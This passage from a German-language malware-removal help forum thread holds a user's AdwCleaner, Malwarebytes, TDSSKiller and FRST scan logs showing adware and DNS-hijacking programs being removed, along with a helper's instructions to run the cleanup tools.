0x0ce4 [ 39D212A2684CC960AA166629CC2A5B89, 816D9B1405BD5BB073EFDA8F3B6F1A5DCAE739AB3FEB9267FDD4A113A5E8F1B7 ] C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe 21:27:16.0712 0x0ce4 SmartSwitchPDLR.exe - ok 21:27:16.0714 0x0ce4 Waiting for KSN requests completion. 
In queue: 280
21:27:17.0731 0x0ce4 AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.11.15063.0 ), 0x60100 ( disabled : updated )
21:27:17.0732 0x0ce4 AV detected via SS2: Bitdefender Virenschutz, C:\Program Files\Bitdefender\Bitdefender 2017\wscfix.exe ( 21.0.25.76 ), 0x41000 ( enabled : updated )
21:27:17.0733 0x0ce4 FW detected via SS2: Bitdefender Firewall, C:\Program Files\Bitdefender\Bitdefender 2017\wscfix.exe ( 21.0.25.76 ), 0x41010 ( enabled )
21:27:17.0987 0x0ce4 ============================================================
21:27:17.0987 0x0ce4 Scan finished
21:27:17.0987 0x0ce4 ============================================================
21:27:17.0991 0x29a0 Detected object count: 1
21:27:17.0991 0x29a0 Actual detected object count: 1
21:27:25.0283 0x29a0 GamingMouse ( UnsignedFile.Multi.Generic ) - skipped by user
21:27:25.0283 0x29a0 GamingMouse ( UnsignedFile.Multi.Generic ) - User select action: Skip
I think I have everything now. |
22.05.2017, 14:55 | #11 |
/// TB-Ausbilder | Trojan, adware or something else? Hello,
Step 1 Please download AdwCleaner to your desktop.
Step 2 Please download Malwarebytes Anti-Malware 3
Step 3
With your next reply, please post
|
22.05.2017, 17:38 | #12 |
| Trojan, adware or something else? Hi Matthias, AdwCleaner is supposed to have a new update (6.047) by now. But I used the version from Filepony, as you described. The log is attached. Code:
# AdwCleaner v6.046 - Bericht erstellt am 22/05/2017 um 18:19:38
# Aktualisiert am 24/04/2017 von Malwarebytes
# Datenbank : 2017-05-19.1 [Server]
# Betriebssystem : Windows 10 Pro (X64)
# Benutzername : Dino - ****
# Gestartet von : C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
# Modus: Löschen
# Unterstützung : https://www.malwarebytes.com/support

***** [ Dienste ] *****

***** [ Ordner ] *****

[-] Ordner gelöscht: C:\ProgramData\4f229b49-57c7-0
[-] Ordner gelöscht: C:\ProgramData\4f229b49-5e15-0
[-] Ordner gelöscht: C:\ProgramData\646f2bbc
[-] Ordner gelöscht: C:\ProgramData\b540151d-6521-1
[-] Ordner gelöscht: C:\ProgramData\b540151d-6b21-0
[-] Ordner gelöscht: C:\ProgramData\{094151c3-112c-0}
[-] Ordner gelöscht: C:\ProgramData\{1ed33b8d-712c-0}
[-] Ordner gelöscht: C:\ProgramData\{2b0a4a26-612c-1}
[-] Ordner gelöscht: C:\Users\Dino\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Note-up
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\gplyra
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Kuaizip
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Softlink
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Microleaves
[#] Ordner mit Neustart gelöscht: C:\Users\Dino\AppData\Roaming\Note-UP
[-] Ordner gelöscht: C:\Program Files\Common Files\Noobzo
[-] Ordner gelöscht: C:\ProgramData\DownloadManager
[-] Ordner gelöscht: C:\ProgramData\SearchModule
[-] Ordner gelöscht: C:\Program Files (x86)\DPower
[-] Ordner gelöscht: C:\Program Files (x86)\BestCleaner
[-] Ordner gelöscht: C:\Users\Dino\AppData\Local\app
[#] Ordner mit Neustart gelöscht: C:\Program Files (x86)\DPower
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\naweriweentcofise
[-] Ordner gelöscht: C:\WINDOWS\SysWOW64\sstmp

***** [ Dateien ] *****

[-] Datei gelöscht: C:\WINDOWS\SysNative\drivers\NetUtils2016.sys

***** [ DLL ] *****

***** [ WMI ] *****

***** [ Verknüpfungen ] *****

***** [ Aufgabenplanung ] *****

[-] Aufgabe gelöscht: {0E0E0947-0F0F-7D0F-7D11-0E0F78051104}

***** [ Registrierungsdatenbank ] *****

[-] Schlüssel gelöscht: HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Spark
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\Spark
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Spark
[-] Daten wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a} [NameServer]
[-] Daten wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034} [NameServer]
[-] Daten wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef} [NameServer]
[-] Daten wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0} [NameServer]
[-] Daten wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a} [NameServer]
[-] Daten wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034} [NameServer]
[-] Daten wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef} [NameServer]
[-] Daten wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0} [NameServer]
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[-] Schlüssel gelöscht: HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E

***** [ Browser ] *****

[-] [C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData] [startup_urls] Gelöscht: hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
[-] [C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData] [homepage] Gelöscht: hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp

*************************

:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: "Image File Execution Options" Schlüssel gelöscht
:: "Prefetch" Dateien gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Firewall Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [6588 Bytes] - [22/05/2017 18:19:38]
C:\AdwCleaner\AdwCleaner[S0].txt - [6473 Bytes] - [22/05/2017 18:18:35]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [6734 Bytes] ##########
Code:
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 22.05.17
Scan-Zeit: 18:25
Protokolldatei: Mbam.txt
Administrator: Ja

-Softwaredaten-
Version: 3.1.2.1733
Komponentenversion: 1.0.122
Version des Aktualisierungspakets: 1.0.1995
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: ****\Dino

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Ergebnis: Abgeschlossen
Gescannte Objekte: 377606
Erkannte Bedrohungen: 30
In die Quarantäne verschobene Bedrohungen: 30
Abgelaufene Zeit: 1 Min., 8 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 1
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{646f2bbc}, In Quarantäne, [28], [260250],1.0.1995

Registrierungswert: 1
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{646f2bbc}|1, In Quarantäne, [28], [260250],1.0.1995

Registrierungsdaten: 14
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{46b778ab-edfa-42f3-91a9-8cdd864f74fe}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{7340d9b1-829b-408c-bec7-3deae2933b18}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{b99ccfae-f682-4e7e-b110-ad59dc2334c2}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 5
Adware.Elex.SHHKRST, C:\USERS\DINO\APPDATA\ROAMING\Thertsparimoly, In Quarantäne, [11], [373192],1.0.1995
PUP.Optional.SwytShop, C:\USERS\DINO\APPDATA\LOCAL\Programs\SS_FF, In Quarantäne, [3121], [375392],1.0.1995
PUP.Optional.SwytShop, C:\USERS\DINO\APPDATA\LOCAL\Programs\SwytShop_Pkg1, In Quarantäne, [3121], [386986],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\PROGRAM FILES (X86)\X7YP5EPJng, In Quarantäne, [2795], [371199],1.0.1995

Datei: 9
PUP.Optional.SwytShop, C:\Users\Dino\AppData\Local\Programs\SS_FF\SS_FF.xpi, In Quarantäne, [3121], [375392],1.0.1995
PUP.Optional.SwytShop, C:\Users\Dino\AppData\Local\Programs\SwytShop_Pkg1\unins000.dat, In Quarantäne, [3121], [386986],1.0.1995
PUP.Optional.Youndoo, C:\USERS\DINO\APPDATA\ROAMING\PROFILES\PRISERPYGRESENT.DEFAULT\SEARCHPLUGINS\ME1J2IQC.XML, In Quarantäne, [599], [324489],1.0.1995
Adware.OtherSearch.TSKRST, C:\PROGRAM FILES (X86)\X7YP5EPJng\SSL\OtherSearch Inc CA 2.cer, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL\cert.db, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL\xtls.db, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL\xv.db, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\dlog.txt, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\s.xml, In Quarantäne, [2795], [371199],1.0.1995

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

(end)
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017
durchgeführt von Dino (Administrator) auf *** (22-05-2017 18:36:22)
Gestartet von C:\Users\Dino\Desktop
Geladene Profile: Dino & (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.0_none_1a733a82001933cc\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe"
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe"

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\Parameters: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{0784e829-3340-11e7-867e-806e6f6e6963}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{46b778ab-edfa-42f3-91a9-8cdd864f74fe}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{7340d9b1-829b-408c-bec7-3deae2933b18}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{b99ccfae-f682-4e7e-b110-ad59dc2334c2}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)

FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-22]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
